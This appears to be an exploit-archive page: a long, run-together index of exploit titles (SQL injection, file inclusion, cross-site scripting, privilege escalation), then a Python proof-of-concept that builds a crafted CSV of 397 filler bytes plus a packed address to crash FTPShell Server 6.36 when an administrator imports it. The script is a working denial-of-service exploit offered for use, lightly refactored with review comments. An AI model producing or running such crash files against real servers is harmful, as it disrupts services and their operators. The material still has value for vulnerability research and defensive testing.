
4 new exploits Serv-U FTP Server < 5.2 - Remote Denial of Service RhinoSoft Serv-U FTP Server < 5.2 - Remote Denial of Service Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service RhinoSoft Serv-U FTP Server 7.4.0.1 - (SMNT) Authenticated Denial of Service FTPShell Server 6.36 - '.csv' Local Denial of Service Serv-U FTP Server 3.x < 5.x - Privilege Escalation RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation Serv-U FTP Server 7.4.0.1 - (MKD) Create Arbitrary Directories Exploit RhinoSoft Serv-U FTP Server 7.4.0.1 - 'MKD' Create Arbitrary Directories Exploit Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal Cat Soft Serv-U FTP Server 2.4/2.5 - FTP Directory Traversal IndexScript 2.8 - (show_cat.php cat_id) SQL Injection IndexScript 2.8 - 'cat_id' Parameter SQL Injection GForge < 4.6b2 - (skill_delete) SQL Injection GForge < 4.6b2 - 'skill_delete' Parameter SQL Injection torrenttrader classic 1.07 - Multiple Vulnerabilities TorrentTrader Classic 1.07 - Multiple Vulnerabilities Camera Life 2.6.2 - 'id' SQL Injection Camera Life 2.6.2 - 'id' Parameter SQL Injection Full PHP Emlak Script - 'arsaprint.php id' SQL Injection Full PHP Emlak Script - 'arsaprint.php' SQL Injection CCMS 3.1 - (skin) Multiple Local File Inclusion CCMS 3.1 - 'skin' Parameter Local File Inclusion JMweb - Multiple (src) Local File Inclusion JMweb - 'src' Parameter Local File Inclusion geccBBlite 2.0 - (leggi.php id) SQL Injection geccBBlite 2.0 - 'id' Parameter SQL Injection PHP-Fusion Mod raidtracker_panel - (INFO_RAID_ID) SQL Injection PHP-Fusion Mod recept - (kat_id) SQL Injection PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' Parameter SQL Injection PHP-Fusion Mod recept - 'kat_id' Parameter SQL Injection Yerba SACphp 6.3 - (mod) Local File Inclusion 
Yerba SACphp 6.3 - Local File Inclusion Joomla! Component com_hotspots - (w) SQL Injection Joomla! Component com_hotspots - SQL Injection PHP Realtor 1.5 - (view_cat.php v_cat) SQL Injection PHP Auto Dealer 2.7 - (view_cat.php v_cat) SQL Injection PHP Autos 2.9.1 - (searchresults.php catid) SQL Injection Built2Go PHP Realestate 1.5 - (event_detail.php) SQL Injection PHP Realtor 1.5 - 'v_cat' Parameter SQL Injection PHP Auto Dealer 2.7 - 'v_cat' Parameter SQL Injection PHP Autos 2.9.1 - 'catid' Parameter SQL Injection Built2Go PHP Realestate 1.5 - 'event_detail.php' SQL Injection AdMan 1.1.20070907 - 'campaignId' SQL Injection AdMan 1.1.20070907 - 'campaignId' Parameter SQL Injection Gforge 4.5.19 - Multiple SQL Injections Gforge 4.6 rc1 - (skill_edit) SQL Injection GForge 4.5.19 - Multiple SQL Injections Gforge 4.6 rc1 - 'skill_edit' Parameter SQL Injection camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting Camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting IranMC Arad Center - 'news.php id' SQL Injection IranMC Arad Center - SQL Injection Ayco Okul Portali - (linkid) SQL Injection (tr) Ayco Okul Portali - 'linkid' Parameter SQL Injection Easynet4u faq Host - 'faq.php faq' SQL Injection Easynet4u faq Host - 'faq.php' SQL Injection MunzurSoft Wep Portal W3 - (kat) SQL Injection Easynet4u Link Host - 'cat_id' SQL Injection SlimCMS 1.0.0 - (redirect.php) Privilege Escalation Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection MunzurSoft Wep Portal W3 - 'kat' Parameter SQL Injection Easynet4u Link Host - 'cat_id' Parameter SQL Injection SlimCMS 1.0.0 - 'redirect.php' Privilege Escalation Joomla! 
Component ownbiblio 1.5.3 - 'catid' Parameter SQL Injection Real Estate Scripts 2008 - 'index.php cat' SQL Injection Real Estate Scripts 2008 - 'cat' Parameter SQL Injection ParsBlogger - 'links.asp id' SQL Injection IndexScript 3.0 - (sug_cat.php parent_id) SQL Injection ParsBlogger - 'links.asp' SQL Injection IndexScript 3.0 - 'parent_id' Parameter SQL Injection XOOPS Module xhresim - 'index.php no' SQL Injection XOOPS Module xhresim - SQL Injection SezHoo 0.1 - (IP) Remote File Inclusion SezHoo 0.1 - Remote File Inclusion torrenttrader classic 1.09 - Multiple Vulnerabilities TorrentTrader Classic 1.09 - Multiple Vulnerabilities AdaptCMS Lite 1.5 2009-07-07 - Exploit AdaptCMS Lite 1.5 - Arbitrary Add Admin Absolute Poll Manager XE 4.1 - xlaapmview.asp Cross-Site Scripting Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting GForge 3.1/4.5/4.6 - Verify.php Cross-Site Scripting GForge 3.1/4.5/4.6 - 'Verify.php' Cross-Site Scripting OpenNMS 1.5.x - j_acegi_security_check j_username Parameter Cross-Site Scripting OpenNMS 1.5.x - notification/list.jsp 'Username' Parameter Cross-Site Scripting OpenNMS 1.5.x - event/list filter Parameter Cross-Site Scripting OpenNMS 1.5.x - 'j_username' Parameter Cross-Site Scripting OpenNMS 1.5.x - 'Username' Parameter Cross-Site Scripting OpenNMS 1.5.x - 'filter' Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - DomainConfig.do Operation Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - jsp/AddDC.jsp domainName Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - 'Operation' Parameter Cross-Site Scripting ManageEngine ADManager Plus 5.2 Build 5210 - 'domainName' Parameter Cross-Site Scripting Joomla! Component Blog Calendar - SQL Injection PHPMailer 5.2.17 - Remote Code Execution
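#Exploit FTPShell server 6.36 '.csv' Crash(PoC)
#Author: albalawi_sultan
#Tested on:win7
#st :http://www.ftpshell.com/download.htm
#1-open FTPShell Server Administrator
#2-manage Ftp accounts
#3-import from csv
#
# Review notes:
# - The crash is reached only through the administrator's "import from csv"
#   action (steps 1-3 above), i.e. a local denial of service: the file has to
#   be loaded by the server operator, so the exposure is limited to
#   account-import files from untrusted sources.
# - The file written is a single oversized field: PAD_LEN filler bytes
#   followed by one little-endian DWORD (E). It is built as bytes and written
#   in binary mode so the output is byte-identical on Python 2 and Python 3;
#   the original str + "w" form only ran under Python 2 (str/bytes mix and
#   print statements fail on Python 3).
# - The file handle is released through a context manager so it is closed
#   even if write() raises; the old module-level name shadowed the builtin
#   `file`.
import struct

# Banner (ASCII art plus the author's contact lines), kept as the original
# hex-escaped text so that its bytes are unchanged.
ban = (
    '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
    '\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
    '\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
    '\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
    '\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
    '\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
    '\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
    '\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
    '\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
    '\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
    '\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
    '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
    '\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
    '\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
    '\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
    '\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
    '\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
    '\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
    '\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
    '\x20\x20\x20\x20\x20\x20\x5e\x0d\x0a\x20\x2c\x2e\x20\x7c\x20\x20'
    '\x20\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x60\x2e\x5f\x2e\x27'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
    '\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x5e\x2d\x2d\x2d\x5e\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20\x3a\x20\x20\x2e\x20\x60'
    '\x20\x20\x3b\x20\x20\x20\x60\x20\x20\x60\x20\x2d\x2d\x2c\x2e\x2e'
    '\x5f\x3b\x2d\x2d\x2d\x3e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c'
    '\x20\x20\x20\x20\x20\x20\x20\x27\x2e\x27\x2e\x27\x5f\x5f\x5f\x5f'
    '\x5f\x5f\x5f\x5f\x20\x2a\x0d\x0a\x20\x20\x27\x20\x60\x20\x20\x20'
    '\x20\x2c\x20\x20\x20\x29\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x7c\x5f\x7c\x20\x46\x69\x72\x65\x77'
    '\x61\x6c\x6c\x20\x29\x0d\x0a\x20\x20\x20\x20\x20\x60\x2e\x5f\x20'
    '\x2c\x20\x20\x27\x20\x20\x20\x2f\x5f\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20'
    '\x7c\x7c\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3b\x20\x2c\x27'
    '\x27\x2d\x2c\x3b\x27\x20\x60\x60\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f'
    '\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x7c\x0d\x0a\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x60\x60\x2d\x2e\x2e\x5f\x5f\x60\x60\x2d'
    '\x2d\x60\x20\x20\x20\x20\x20\x20\x20\x69\x70\x73\x20\x20\x20\x20'
    '\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x5e'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2f\x0d\x0a\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x27'
    '\x2e\x20\x5f\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2a\x0d\x0a\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x2d\x5f\x5f\x5f\x5f\x5f\x5f\x5f\x20'
    '\x7c\x5f\x20\x20\x49\x50\x53\x20\x20\x20\x20\x20\x29\x0d\x0a\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
    '\x20\x20\x20\x20\x7c\x7c\x20\x20\x20\x20\x20\x7c\x7c\x0d\x0a\x20'
    '\n'
    '\x53\x75\x6c\x74\x61\x6e\x5f\x41\x6c\x62\x61\x6c\x61\x77\x69\n'
    '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d\x2f\x70\x65\x6e\x74\x65\x73\x74\x33\n'
    "\x61\x6c\x62\x61\x6c\x61\x77\x69\x34\x70\x65\x6e\x74\x65\x73\x74\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"
)
print(ban)

# JMP to KERNELBA.CloseHandle (address as given in the original PoC);
# packed as a 4-byte little-endian DWORD.
E = struct.pack("<L", 0x00F39658)

# Number of filler bytes placed in front of E (the original's "#397").
PAD_LEN = 397

# Complete file content: filler run followed by the packed DWORD.
EXp = b"\x41" * PAD_LEN + E

upfile = "Exoploit_ftpshell.csv"

# Binary mode: no newline translation, same bytes on every platform and
# interpreter; the context manager closes the handle even if write() raises.
with open(upfile, "wb") as out:
    out.write(EXp)

print('done:- {}'.format(upfile))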